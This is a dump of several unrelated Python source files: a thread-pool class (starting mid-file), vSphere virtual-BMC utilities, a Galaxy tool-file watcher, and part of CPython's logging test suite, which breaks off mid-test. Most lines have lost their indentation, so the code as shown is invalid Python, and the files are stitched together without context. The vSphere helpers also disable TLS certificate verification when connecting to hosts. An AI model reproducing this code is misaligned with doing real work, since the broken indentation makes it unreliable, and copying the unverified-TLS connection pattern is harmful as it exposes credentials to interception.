:type agent_config AmbariConfig.AmbariConfig
"""
self.core_threads = core_threads
self.max_threads = max(max_threads, core_threads, 1)
self.keepalive = keepalive
self._queue = Queue()
self._threads_lock = Lock()
self._threads = set()
self._shutdown = False
self._job_context_injector = context_injector
self._agent_config = agent_config
_threadpools.add(ref(self))
logger.info('Started thread pool with %d core threads and %s maximum '
'threads', core_threads, max_threads or 'unlimited')
def _adjust_threadcount(self):
self._threads_lock.acquire()
try:
if self.num_threads < self.max_threads:
self._add_thread(self.num_threads < self.core_threads)
finally:
self._threads_lock.release()
def _add_thread(self, core):
t = Thread(target=self._run_jobs, args=(core,))
        t.daemon = True
t.start()
self._threads.add(t)
def _run_jobs(self, core):
logger.debug('Started worker thread')
block = True
timeout = None
if not core:
block = self.keepalive > 0
timeout = self.keepalive
if self._job_context_injector is not None:
self._job_context_injector(self._agent_config)
while True:
try:
func, args, kwargs = self._queue.get(block, timeout)
except Empty:
break
if self._shutdown:
break
try:
func(*args, **kwargs)
            except Exception:
                logger.exception('Error in worker thread')
self._threads_lock.acquire()
self._threads.remove(currentThread())
self._threads_lock.release()
logger.debug('Exiting worker thread')
@property
def num_threads(self):
return len(self._threads)
def submit(self, func, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new tasks after shutdown')
self._queue.put((func, args, kwargs))
self._adjust_threadcount()
def shutdown(self, wait=True):
if self._shutdown:
return
        logger.info('Shutting down thread pool')
self._shutdown = True
_threadpools.remove(ref(self))
self._threads_lock.acquire()
for _ in range(self.num_threads):
self._queue.put((None, None, None))
self._threads_lock.release()
if wait:
self._threads_lock.acquire()
threads = tuple(self._threads)
self._threads_lock.release()
for thread in threads:
thread.join()
def __repr__(self):
if self.max_threads:
threadcount = '%d/%d' % (self.num_threads, self.max_threads)
else:
threadcount = '%d' % self.num_threads
return '<ThreadPool at %x; threads=%s>' % (id(self), threadcount)
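# Illustrative usage sketch (the submitted callable below is an example, not part of this
# module): submit() queues a callable and lazily grows the pool up to max_threads, and
# shutdown() drains the workers; pools are also drained on interpreter exit via ExitHelper.
def _thread_pool_example():
    import time
    results = []
    pool = ThreadPool(core_threads=2, max_threads=4)
    for i in range(8):
        pool.submit(results.append, i * i)
    time.sleep(0.5)  # crude wait; this pool exposes no futures or per-task join
    pool.shutdown()
    print(sorted(results))  # [0, 1, 4, 9, 16, 25, 36, 49]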
|
utils.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import os
import re
import ssl
import sys
import urllib.parse
import urllib.request
from threading import Thread
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from vbmc4vsphere import exception
class viserver_open(object):
def __init__(self, vi, vi_username=None, vi_password=None, readonly=False):
self.vi = vi
self.vi_username = vi_username
self.vi_password = vi_password
self.readonly = readonly
def __enter__(self):
context = None
if hasattr(ssl, "_create_unverified_context"):
context = ssl._create_unverified_context()
try:
self.conn = SmartConnect(
host=self.vi,
user=self.vi_username,
pwd=self.vi_password,
# port=self.vi_port,
sslContext=context,
)
if not self.conn:
raise Exception
except Exception as e:
raise exception.VIServerConnectionOpenError(vi=self.vi, error=e)
return self.conn
def __exit__(self, type, value, traceback):
_ = Disconnect(self.conn)
def get_obj(conn, root, vim_type):
container = conn.content.viewManager.CreateContainerView(root, vim_type, True)
view = container.view
container.Destroy()
return view
def create_filter_spec(pc, vms, prop):
objSpecs = []
for vm in vms:
objSpec = vmodl.query.PropertyCollector.ObjectSpec(obj=vm)
objSpecs.append(objSpec)
filterSpec = vmodl.query.PropertyCollector.FilterSpec()
filterSpec.objectSet = objSpecs
propSet = vmodl.query.PropertyCollector.PropertySpec(all=False)
propSet.type = vim.VirtualMachine
propSet.pathSet = [prop]
filterSpec.propSet = [propSet]
return filterSpec
def filter_results(result, value):
vms = []
for o in result.objects:
if o.propSet[0].val == value:
vms.append(o.obj)
return vms
def get_viserver_vm(conn, vm):
try:
vms = get_obj(conn, conn.content.rootFolder, [vim.VirtualMachine])
pc = conn.content.propertyCollector
filter_spec = create_filter_spec(pc, vms, "name")
options = vmodl.query.PropertyCollector.RetrieveOptions()
result = pc.RetrievePropertiesEx([filter_spec], options)
vms = filter_results(result, vm)
if len(vms) != 1:
raise Exception
return vms[0]
except Exception:
raise exception.VMNotFound(vm=vm)
def get_bootable_device_type(conn, boot_dev):
if isinstance(boot_dev, vim.vm.BootOptions.BootableFloppyDevice):
return "floppy"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableDiskDevice):
return "disk"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableCdromDevice):
return "cdrom"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableEthernetDevice):
return "ethernet"
def set_boot_device(conn, vm, device):
"""Set boot device to specified device.
https://github.com/ansible-collections/vmware/blob/main/plugins/module_utils/vmware.py
"""
boot_order_list = []
if device == "cdrom":
bootable_cdroms = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualCdrom)
]
if bootable_cdroms:
boot_order_list.append(vim.vm.BootOptions.BootableCdromDevice())
elif device == "disk":
bootable_disks = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualDisk)
]
if bootable_disks:
boot_order_list.extend(
[
vim.vm.BootOptions.BootableDiskDevice(deviceKey=bootable_disk.key)
for bootable_disk in bootable_disks
]
)
elif device == "ethernet":
bootable_ethernets = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualEthernetCard)
]
if bootable_ethernets:
boot_order_list.extend(
[
vim.vm.BootOptions.BootableEthernetDevice(
deviceKey=bootable_ethernet.key
)
for bootable_ethernet in bootable_ethernets
]
)
elif device == "floppy":
bootable_floppy = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualFloppy)
]
if bootable_floppy:
boot_order_list.append(vim.vm.BootOptions.BootableFloppyDevice())
kwargs = dict()
kwargs.update({"bootOrder": boot_order_list})
vm_conf = vim.vm.ConfigSpec()
vm_conf.bootOptions = vim.vm.BootOptions(**kwargs)
vm.ReconfigVM_Task(vm_conf)
return
def send_nmi(conn, vm):
"""Send NMI to specified VM.
https://github.com/vmware/pyvmomi/issues/726
"""
context = None
if hasattr(ssl, "_create_unverified_context"):
context = ssl._create_unverified_context()
vmx_path = vm.config.files.vmPathName
for ds_url in vm.config.datastoreUrl:
vmx_path = vmx_path.replace("[%s] " % ds_url.name, "%s/" % ds_url.url)
url = "https://%s/cgi-bin/vm-support.cgi?manifests=%s&vm=%s" % (
vm.runtime.host.name,
urllib.parse.quote_plus("HungVM:Send_NMI_To_Guest"),
urllib.parse.quote_plus(vmx_path),
)
spec = vim.SessionManager.HttpServiceRequestSpec(method="httpGet", url=url)
ticket = conn.content.sessionManager.AcquireGenericServiceTicket(spec)
headers = {
"Cookie": "vmware_cgi_ticket=%s" % ticket.id,
}
req = urllib.request.Request(url, headers=headers)
Thread(
target=urllib.request.urlopen, args=(req,), kwargs={"context": context}
).start()
def check_viserver_connection_and_vm(vi, vm, vi_username=None, vi_password=None):
with viserver_open(
vi, readonly=True, vi_username=vi_username, vi_password=vi_password
) as conn:
get_viserver_vm(conn, vm)
def is_pid_running(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
def str2bool(string):
lower = string.lower()
if lower not in ("true", "false"):
        raise ValueError('Value "%s" cannot be interpreted as boolean' % string)
return lower == "true"
def mask_dict_password(dictionary, secret="***"):
"""Replace passwords with a secret in a dictionary."""
d = dictionary.copy()
for k in d:
if "password" in k:
d[k] = secret
return d
def generate_fakemac_by_vm_name(vm_name):
hash = hashlib.md5(vm_name.encode()).digest()
fakemac = ":".join(
"%02x" % b for b in [0x02, 0x00, 0x00, hash[0], hash[1], hash[2]]
)
return fakemac
def convert_fakemac_string_to_bytes(fakemac_str):
fakemac_bytes = [int(b, 16) for b in re.split(":|-", fakemac_str)]
return fakemac_bytes
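# Illustrative sketch (the VM name is an example): the fake MAC is a locally administered
# address (02:00:00:...) whose last three octets come from the MD5 of the VM name, so the
# same name always maps to the same address.
def _fakemac_example():
    mac = generate_fakemac_by_vm_name("example-vm")
    print(mac)                                   # '02:00:00:xx:xx:xx' style string
    print(convert_fakemac_string_to_bytes(mac))  # the same address as six 0-255 integers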
class detach_process(object):
"""Detach the process from its parent and session."""
def _fork(self, parent_exits):
try:
pid = os.fork()
if pid > 0 and parent_exits:
os._exit(0)
return pid
except OSError as e:
raise exception.DetachProcessError(error=e)
def _change_root_directory(self):
"""Change to root directory.
Ensure that our process doesn't keep any directory in use. Failure
to do this could make it so that an administrator couldn't
unmount a filesystem, because it was our current directory.
"""
try:
os.chdir("/")
except Exception as e:
error = "Failed to change root directory. Error: %s" % e
raise exception.DetachProcessError(error=error)
def _change_file_creation_mask(self):
"""Set the umask for new files.
Set the umask for new files the process creates so that it does
have complete control over the permissions of them. We don't
know what umask we may have inherited.
"""
try:
os.umask(0)
except Exception as e:
error = "Failed to change file creation mask. Error: %s" % e
raise exception.DetachProcessError(error=error)
def __enter__(self):
pid = self._fork(parent_exits=False)
if pid > 0:
return pid
os.setsid()
self._fork(parent_exits=True)
self._change_root_directory()
self._change_file_creation_mask()
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, "r")
so = open(os.devnull, "a+")
se = open(os.devnull, "a+")
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
return pid
def __exit__(self, type, value, traceback):
pass
|
watcher.py
|
import logging
import os.path
import threading
import time
try:
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
can_watch = True
except ImportError:
Observer = None
FileSystemEventHandler = object
PollingObserver = None
can_watch = False
from galaxy.util.hash_util import md5_hash_file
from galaxy.util.postfork import register_postfork_function
log = logging.getLogger( __name__ )
def get_observer_class(config_value, default, monitor_what_str):
"""
"""
config_value = config_value or default
config_value = str(config_value).lower()
if config_value in ("true", "yes", "on", "auto"):
expect_observer = True
observer_class = Observer
elif config_value == "polling":
expect_observer = True
observer_class = PollingObserver
elif config_value in ('false', 'no', 'off'):
expect_observer = False
observer_class = None
else:
message = "Unrecognized value for watch_tools config option: %s" % config_value
raise Exception(message)
if expect_observer and observer_class is None:
message = "Watchdog library unavailable, cannot monitor %s." % monitor_what_str
if config_value == "auto":
log.info(message)
else:
raise Exception(message)
return observer_class
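# Illustrative sketch (the config value here is an example): "auto" uses the native
# Observer when watchdog is importable and quietly returns None otherwise, "polling"
# forces PollingObserver, and "false"/"no"/"off" disable watching.
def _get_observer_class_example():
    cls = get_observer_class("auto", default="False", monitor_what_str="tools")
    print(cls)  # Observer, or None if the watchdog library is unavailable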
def get_tool_conf_watcher(reload_callback):
return ToolConfWatcher(reload_callback)
def get_tool_watcher(toolbox, config):
config_value = getattr(config, "watch_tools", None)
observer_class = get_observer_class(config_value, default="False", monitor_what_str="tools")
if observer_class is not None:
return ToolWatcher(toolbox, observer_class=observer_class)
else:
return NullWatcher()
class ToolConfWatcher(object):
def __init__(self, reload_callback):
self.paths = {}
self._active = False
self._lock = threading.Lock()
self.thread = threading.Thread(target=self.check, name="ToolConfWatcher.thread")
self.thread.daemon = True
self.event_handler = ToolConfFileEventHandler(reload_callback)
def start(self):
if not self._active:
self._active = True
register_postfork_function(self.thread.start)
def shutdown(self):
if self._active:
self._active = False
self.thread.join()
def check(self):
hashes = { key: None for key in self.paths.keys() }
while self._active:
do_reload = False
with self._lock:
paths = list(self.paths.keys())
for path in paths:
if not os.path.exists(path):
continue
mod_time = self.paths[path]
if not hashes.get(path, None):
hashes[path] = md5_hash_file(path)
new_mod_time = None
if os.path.exists(path):
new_mod_time = time.ctime(os.path.getmtime(path))
if new_mod_time != mod_time:
new_hash = md5_hash_file(path)
if hashes[path] != new_hash:
self.paths[path] = new_mod_time
hashes[path] = new_hash
log.debug("The file '%s' has changes.", path)
do_reload = True
if do_reload:
with self._lock:
t = threading.Thread(target=self.event_handler.on_any_event)
t.daemon = True
t.start()
time.sleep(1)
def monitor(self, path):
mod_time = None
if os.path.exists(path):
mod_time = time.ctime(os.path.getmtime(path))
with self._lock:
self.paths[path] = mod_time
self.start()
def watch_file(self, tool_conf_file):
self.monitor(tool_conf_file)
self.start()
class NullToolConfWatcher(object):
def start(self):
pass
def shutdown(self):
pass
def monitor(self, conf_path):
pass
def watch_file(self, tool_file, tool_id):
pass
class ToolConfFileEventHandler(FileSystemEventHandler):
def __init__(self, reload_callback):
self.reload_callback = reload_callback
def on_any_event(self, event=None):
self._handle(event)
def _handle(self, event):
self.reload_callback()
class ToolWatcher(object):
def __init__(self, toolbox, observer_class):
self.toolbox = toolbox
self.tool_file_ids = {}
self.tool_dir_callbacks = {}
self.monitored_dirs = {}
self.observer = observer_class()
self.event_handler = ToolFileEventHandler(self)
self.start()
def start(self):
register_postfork_function(self.observer.start)
def shutdown(self):
self.observer.stop()
self.observer.join()
def monitor(self, dir):
self.observer.schedule(self.event_handler, dir, recursive=False)
def watch_file(self, tool_file, tool_id):
tool_file = os.path.abspath( tool_file )
self.tool_file_ids[tool_file] = tool_id
tool_dir = os.path.dirname( tool_file )
if tool_dir not in self.monitored_dirs:
self.monitored_dirs[ tool_dir ] = tool_dir
self.monitor( tool_dir )
def watch_directory(self, tool_dir, callback):
tool_dir = os.path.abspath( tool_dir )
self.tool_dir_callbacks[tool_dir] = callback
if tool_dir not in self.monitored_dirs:
self.monitored_dirs[ tool_dir ] = tool_dir
self.monitor( tool_dir )
class ToolFileEventHandler(FileSystemEventHandler):
def __init__(self, tool_watcher):
self.tool_watcher = tool_watcher
def on_any_event(self, event):
self._handle(event)
def _handle(self, event):
# modified events will only have src path, move events will
# have dest_path and src_path but we only care about dest. So
# look at dest if it exists else use src.
path = getattr( event, 'dest_path', None ) or event.src_path
path = os.path.abspath( path )
tool_id = self.tool_watcher.tool_file_ids.get( path, None )
if tool_id:
try:
self.tool_watcher.toolbox.reload_tool_by_id(tool_id)
except Exception:
pass
elif path.endswith(".xml"):
directory = os.path.dirname( path )
dir_callback = self.tool_watcher.tool_dir_callbacks.get( directory, None )
if dir_callback:
tool_file = event.src_path
tool_id = dir_callback( tool_file )
if tool_id:
self.tool_watcher.tool_file_ids[ tool_file ] = tool_id
class NullWatcher(object):
def start(self):
pass
def shutdown(self):
pass
def watch_file(self, tool_file, tool_id):
pass
def watch_directory(self, tool_dir, callback):
pass
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
        # Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
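# Minimal sketch of how these level mappings are used (the tests below register them in
# setUp): addLevelName attaches the display name, and Logger.log takes the integer level.
def _custom_level_sketch():
    logging.addLevelName(SOCIABLE, my_logging_levels[SOCIABLE])
    logging.getLogger("example").log(SOCIABLE, "a sociable message")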
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* most of the handlers in the tests,
# but we can at least try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
